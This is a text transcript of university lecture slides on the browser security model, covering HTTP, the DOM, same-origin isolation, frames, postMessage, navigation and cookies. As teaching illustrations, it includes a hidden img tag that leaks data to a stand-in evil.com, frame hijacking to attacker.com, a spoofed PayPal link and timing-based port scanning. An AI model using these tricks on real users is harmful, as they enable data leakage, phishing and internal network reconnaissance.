Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five...
Transcript of Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five...
![Page 1: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/1.jpg)
Browser Security Model
John Mitchell
CS155 Spring 2018
![Page 2: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/2.jpg)
Top Web Vulnerabilities 2017
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
![Page 3: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/3.jpg)
Historical Web Vulnerabilities "In the Wild"
Data from aggregator and validator of NVD-reported vulnerabilities
![Page 4: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/4.jpg)
Historical Web vs System vulnerabilities
Decline in % web vulns since 2009n 49% in 2010 -> 37% in 2011.n Big decline in SQL Injection vulnerabilities
XSS peak
![Page 5: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/5.jpg)
Five lectures on Web securityBrowser security modeln The browser as an OS and execution platformn Protocols, isolation, communication, …
HTTPS: goals and pitfallsn Network issues and browser protocol handling
Web application securityn Application pitfalls and defenses
Content security policiesn Additional mechanisms for sandboxing and security
Session management and user authenticationn How users authenticate to web sitesn Browser-server mechanisms for managing state
This 2.5-week section could fill an entire course
![Page 6: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/6.jpg)
Web programming pollFamiliar with basic html?Developed a web application using:n Apache? PHP? Ruby? n Python? SQL?n JavaScript? CSS?n JSON?
Know about: n postMessage? NaCl? Webworkers? CSP?n WebView?
Resource: http://www.w3schools.com/
![Page 7: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/7.jpg)
Goals of web securitySafely browse the webn Visit a variety of web sites without incurring harm
w Integrity: Site A cannot compromise session at Site Bw Confidentiality: no information stolen from your device
Support secure web appsn Apps provided over the web can have same
security properties as stand-alone applicationsSupport secure mobile appsn Web protocols and web content standards are
used as back end of many mobile apps
![Page 8: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/8.jpg)
Web Attacker
Sets up malicious site visited by
victim; no control of network
Alice
System
Web security threat model
![Page 9: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/9.jpg)
Network Attacker
Intercepts and controls network communication
Alice
System
Network security threat model
![Page 10: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/10.jpg)
Web Attacker
Alice
System
Network Attacker
Alice
System
![Page 11: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/11.jpg)
Web Threat ModelsWeb attackern Controls attacker.comn Can obtain SSL/TLS certificate for attacker.comn User visits attacker.com
w Or: runs attacker’s Facebook app, etc.
Network attackern Passive: Wireless eavesdroppern Active: Evil router, DNS poisoning
Malware attackern Attacker escapes browser isolation mechanisms
and run separately under control of OS
![Page 12: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/12.jpg)
Malware attacker
Browsers may contain exploitable bugsn Often enable remote code execution by web sitesn Google study: [the ghost in the browser 2007]
w Found Trojans on 300,000 web pages (URLs)w Found adware on 18,000 web pages (URLs)
Even if browsers were bug-free, still lots of vulnerabilities associated with the webn OWASP top 10: XSS, SQLi, CSRF, …
NOT OUR FOCUS IN THIS PART OF COURSE
![Page 13: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/13.jpg)
OutlineHttpRendering contentIsolationCommunicationNavigationSecurity User InterfaceCookiesFrames and frame busting
![Page 14: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/14.jpg)
HTTP
![Page 15: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/15.jpg)
URLsGlobal identifiers of network-retrievable documents
Example:http://stanford.edu:81/class?name=cs155#homework
Special characters are encoded as hex:n %0A = newlinen %20 or + = space, %2B = + (special exception)
Protocol
Hostname Port PathQuery
Fragment
![Page 16: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/16.jpg)
GET /index.html HTTP/1.1Accept: image/gif, image/x-bitmap, image/jpeg, */*Accept-Language: enConnection: Keep-AliveUser-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)Host: www.example.comReferer: http://www.google.com?q=dingbats
HTTP RequestMethod File HTTP version Headers
Data – none for GETBlank line
GET : no side effect POST : possible side effect
![Page 17: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/17.jpg)
HTTP/1.0 200 OKDate: Sun, 21 Apr 1996 02:20:42 GMTServer: Microsoft-Internet-Information-Server/5.0 Connection: keep-aliveContent-Type: text/htmlLast-Modified: Thu, 18 Apr 1996 17:39:05 GMTSet-Cookie: …Content-Length: 2543
<HTML> Some data... whatever ...</HTML>
HTTP ResponseHTTP version Status code Reason phrase Headers
Data
Cookies
![Page 18: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/18.jpg)
RENDERING CONTENT
![Page 19: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/19.jpg)
Rendering and eventsBasic browser execution modeln Each browser window or frame
w Loads contentw Renders it
n Processes HTML and scripts to display pagen May involve images, subframes, etc.
w Responds to events
Events can ben User actions: OnClick, OnMouseovern Rendering: OnLoad, OnBeforeUnloadn Timing: setTimeout, clearTimeout
![Page 20: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/20.jpg)
Document Object Model (DOM)Object-oriented interface used to read and write docsn web page in HTML is structured datan DOM provides representation of this data structure
Examplesn Properties: document.alinkColor, document.URL,
document.forms[ ], document.links[ ], document.anchors[ ]
n Methods: document.write(document.referrer)
Includes Browser Object Model (BOM)n window, document, frames[], history, location,
navigator (type and version of browser)
![Page 21: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/21.jpg)
Changing HTML using Script, DOM
Some possibilitiesn createElement(elementName)n createTextNode(text)n appendChild(newChild)n removeChild(node)
Example: Add a new list item:
var list = document.getElementById('t1')var newitem = document.createElement('li')var newtext = document.createTextNode(text)list.appendChild(newitem)newitem.appendChild(newtext)
<ul id="t1"><li> Item 1 </li></ul>
HTML
![Page 22: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/22.jpg)
Event example
Source: http://www.w3schools.com/js/js_output.asp
<!DOCTYPE html><html><body>
<h1>My First Web Page</h1><p>My first paragraph.</p>
<button onclick="document.write(5 + 6)">Try it</button>
</body></html>
![Page 23: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/23.jpg)
Examplehttp://phet.colorado.edu/en/simulations/category/html
![Page 24: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/24.jpg)
RENDERING CONTENT –THINK LIKE AN ATTACKER
![Page 25: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/25.jpg)
HTML Image Tags
2
Displays this nice picture èSecurity issues?
<html>…
<p> … </p>…
<img src=“http://example.com/sunset.gif” height="50" width="100"> …
</html>
Basic web functionality
![Page 26: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/26.jpg)
Image tag security issues
2
Communicate with other sitesn <img src=“http://evil.com/pass-local-
information.jpg?extra_information”>Hide resulting image n <img src=“ … ” height=“1" width=“1">
Spoof other sitesn Add logos that fool a user
Important Point: A web page can send information to any site
Security consequences
Q: What threat model are we talking about here?
![Page 27: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/27.jpg)
Web Attacker
Alice
System
Network Attacker
Alice
System
![Page 28: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/28.jpg)
JavaScript onErrorBasic functionn Triggered when error occurs loading a document
or an imageExample
n Runs onError handler if image does not exist and cannot load
<img src="image.gif" onerror="alert('The image could not be loaded.')“
>
http://www.w3schools.com/jsref/jsref_onError.asp
Basic web functionality
![Page 29: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/29.jpg)
JavaScript timing
Sample code
n When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler.
<html><body><img id="test" style="display: none"><script>
var test = document.getElementById(’test’);var start = new Date();test.onerror = function() {
var end = new Date();alert("Total time: " + (end - start));
}test.src = "http://www.example.com/page.html";
</script></body></html>
Basic web functionality
![Page 30: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/30.jpg)
Port scanning behind firewallJavaScript can:n Request images from internal IP addresses
w Example: <img src=“192.168.0.4:8080”/>n Use timeout/onError to determine success/failuren Fingerprint webapps using known image names
Server
MaliciousWeb page
Firewall
1) “show me dancing pigs!”
2) “check this out”
Browser
scan
scan
scan3) port scan results
Security consequence
![Page 31: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/31.jpg)
Remote scriptingGoal: communicate between client-side app running in browser and server-side app, without reloadingMethodsn Java Applet/ActiveX control/Flash
w Can make HTTP requests and interact with client-side JavaScript code, but some aspects may be browser specific
n XML-RPC w open, standards-based technology that requires XML-RPC
libraries on server and in your client-side code. n Simple HTTP via a hidden IFRAME
w IFRAME with a script on your web server is by far the easiest of the three remote scripting options
See: http://developer.apple.com/internet/webcontent/iframe.html
Important Point: A page can maintain bi-directional communication with browser (until user closes/quits)
![Page 32: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/32.jpg)
Simple remote scripting example
<script type="text/javascript">
function handleResponse() {
alert('this function is called from server.html') }
</script>
<iframe id="RSIFrame" name="RSIFrame"
style="width:0px; height:0px; border: 0px"
src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>
<script type="text/javascript">
window.parent.handleResponse()
</script>
RPC can be done silently in JavaScript, passing and receiving arguments
server.html: another page on same server, could be server.php, etc
client.html: “RPC” by passing arguments to server.html in query string
![Page 33: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/33.jpg)
ISOLATION
![Page 34: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/34.jpg)
Frame and iFrameWindow may contain frames from different sourcesn Frame: rigid division as part of framesetn iFrame: floating inline frame
iFrame example
Why use frames?n Delegate screen area to content from another sourcen Browser provides isolation based on framesn Parent may work even if frame is broken
<iframe src="hello.html" width=450 height=100> If you can see this, your browser doesn't understand IFRAME. </iframe>
![Page 35: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/35.jpg)
AnalogyOperating system
Primitivesn System callsn Processesn Disk
Principals: Usersn Discretionary access
controlVulnerabilitiesn Buffer overflown Root exploit
Web browserPrimitivesn Document object modeln Framesn Cookies / localStorage
Principals: “Origins”n Mandatory access control
Vulnerabilitiesn Cross-site scriptingn Cross-site request forgeryn Cache history attacksn …
![Page 36: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/36.jpg)
Windows and frames interact
36
![Page 37: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/37.jpg)
Policy GoalsSafe to visit an evil web site
Safe to visit two pages at the same timen Address bar
distinguishes them
Allow safe delegation
![Page 38: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/38.jpg)
Browser security mechanism
Each frame of a page has an originn Origin = protocol://host:port
Frame can access data on frame with the same originn Network access, Read/write DOM, Storage (cookies)
Frame cannot access data associated with a different origin
A A
B
BA
![Page 39: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/39.jpg)
Components of browser security policy
Frame-Frame relationshipsn canScript(A,B)
w Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
n canNavigate(A,B)w Can Frame A change the origin of content for Frame B?
Frame-principal relationshipsn readCookie(A,S), writeCookie(A,S)
w Can Frame A read/write cookies from site S?
See https://code.google.com/p/browsersec/wiki/Part1https://code.google.com/p/browsersec/wiki/Part2
![Page 40: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/40.jpg)
Domain Relaxation
Origin: scheme, host, (port), hasSetDomainTry document.domain = document.domain
www.facebook.com
www.facebook.comwww.facebook.com chat.facebook.com
chat.facebook.com
facebook.comfacebook.com
![Page 41: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/41.jpg)
Additional mechanisms
Cross-origin network requests
Access-Control-Allow-Origin: <list of domains>
Access-Control-Allow-Origin: *
Cross-origin client side communication
Client-side messaging via navigation (old browsers)
postMessage (modern browsers)
Site BSite A
Site A context Site B context
![Page 42: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/42.jpg)
COMMUNICATION
![Page 43: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/43.jpg)
window.postMessageAPI for inter-frame communicationn Supported in standard browsers
n A network-like channel between frames
Add a contact
Share contacts
![Page 44: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/44.jpg)
postMessage syntax
frames[0].postMessage("Attack at dawn!","http://b.com/");
window.addEventListener("message", function (e) {if (e.origin == "http://a.com") {
... e.data ... }}, false);
FacebookAnecdote
Attack at dawn!
![Page 45: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/45.jpg)
Why include “targetOrigin”?What goes wrong?frames[0].postMessage("Attack at dawn!");
Messages sent to frames, not principalsn When would this happen?
46
![Page 46: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/46.jpg)
NAVIGATION
47
![Page 47: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/47.jpg)
A Guninski Attack
awglogin
window.open("https://attacker.com/", "awglogin");
![Page 48: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/48.jpg)
What should the policy be?
49
Child
Sibling
Descendant
Frame Bust
![Page 49: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/49.jpg)
Browser PolicyIE 6 (default) PermissiveIE 6 (option) ChildIE7 (no Flash) DescendantIE7 (with Flash) PermissiveFirefox 2 WindowSafari 3 PermissiveOpera 9 WindowHTML 5 Child
Legacy Browser Behavior
![Page 50: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/50.jpg)
Window Policy Anomaly
top.frames[1].location = "http://www.attacker.com/...";top.frames[2].location = "http://www.attacker.com/...";
...
![Page 51: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/51.jpg)
Browser PolicyIE 6 (default) PermissiveIE 6 (option) ChildIE7 (no Flash) DescendantIE7 (with Flash) PermissiveFirefox 2 WindowSafari 3 PermissiveOpera 9 WindowHTML 5 Child
Legacy Browser Behavior
![Page 52: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/52.jpg)
Browser PolicyIE7 (no Flash) DescendantIE7 (with Flash) DescendantFirefox 3 DescendantSafari 3 DescendantOpera 9 (many policies)HTML 5 Descendant
Adoption of Descendant Policy
![Page 53: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/53.jpg)
SECURITY USER INTERFACEWhen is it safe to type my password?
![Page 54: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/54.jpg)
Safe to type your password?
55
![Page 55: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/55.jpg)
Safe to type your password?
56
![Page 56: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/56.jpg)
Safe to type your password?
57
![Page 57: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/57.jpg)
Safe to type your password?
58
???
???
![Page 58: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/58.jpg)
Safe to type your password?
59
![Page 59: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/59.jpg)
Mixed Content: HTTP and HTTPSProblemn Page loads over HTTPS, but has HTTP contentn Network attacker can control page
IE: displays mixed-content dialog to usern Flash files over HTTP loaded with no warning (!)n Note: Flash can script the embedding page
Firefox: red slash over lock icon (no dialog)n Flash files over HTTP do not trigger the slash
Safari: does not detect mixed contentDan will talk about this later….
![Page 60: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/60.jpg)
Mixed content and network attacks
Old sites: after login all content over HTTPSn Developer error: Somewhere on bank site write
<script src=http://www.site.com/script.js> </script>
n Active network attacker can now hijack any session
Better way to include content:<script src=//www.site.com/script.js> </script>
n served over the same protocol as embedding page
![Page 61: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/61.jpg)
Lock Icon 2.0Extended validation (EV) certs
• Prominent security indicator for EV certificates
• note: EV site loading content from non-EV site doesnot trigger mixed content warning
![Page 62: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/62.jpg)
Finally: the status Bar
Trivially spoofable<a href=“http://www.paypal.com/”
onclick=“this.href = ‘http://www.evil.com/’;”>PayPal</a>
![Page 63: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/63.jpg)
COOKIES: CLIENT STATE
65
![Page 64: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/64.jpg)
Cookies
Used to store state on user’s machine
BrowserServer
POST …
HTTP Header:Set-cookie: NAME=VALUE ;
domain = (who can read) ;expires = (when expires) ;secure = (only over SSL)
BrowserServerPOST …
Cookie: NAME = VALUE
HTTP is stateless protocol; cookies add state
If expires=NULL:this session only
![Page 65: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/65.jpg)
Cookie authenticationBrowser Web Server Auth server
POST login.cgiUsername & pwd Validate user
auth=valStore val
Set-cookie: auth=val
GET restricted.htmlCookie: auth=val restricted.html
auth=val
YES/NOIf YES, restricted.html
Check val
![Page 66: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/66.jpg)
Cookie Security PolicyUses:n User authenticationn Personalizationn User tracking: e.g. Doubleclick (3rd party cookies)
Origin is the tuple <domain, path>n Can set cookies valid across a domain suffix
![Page 67: Browser Security Model - Applied Cryptography Group | · PDF file · 2017-05-01Five lectures on Web security Browser security model ... n Active: Evil router, DNS poisoning Malware](https://reader031.fdocuments.in/reader031/viewer/2022030509/5ab879da7f8b9ad3038cd9d2/html5/thumbnails/67.jpg)
Secure Cookies
BrowserServer
GET …
HTTP Header:Set-cookie: NAME=VALUE ;
Secure=true
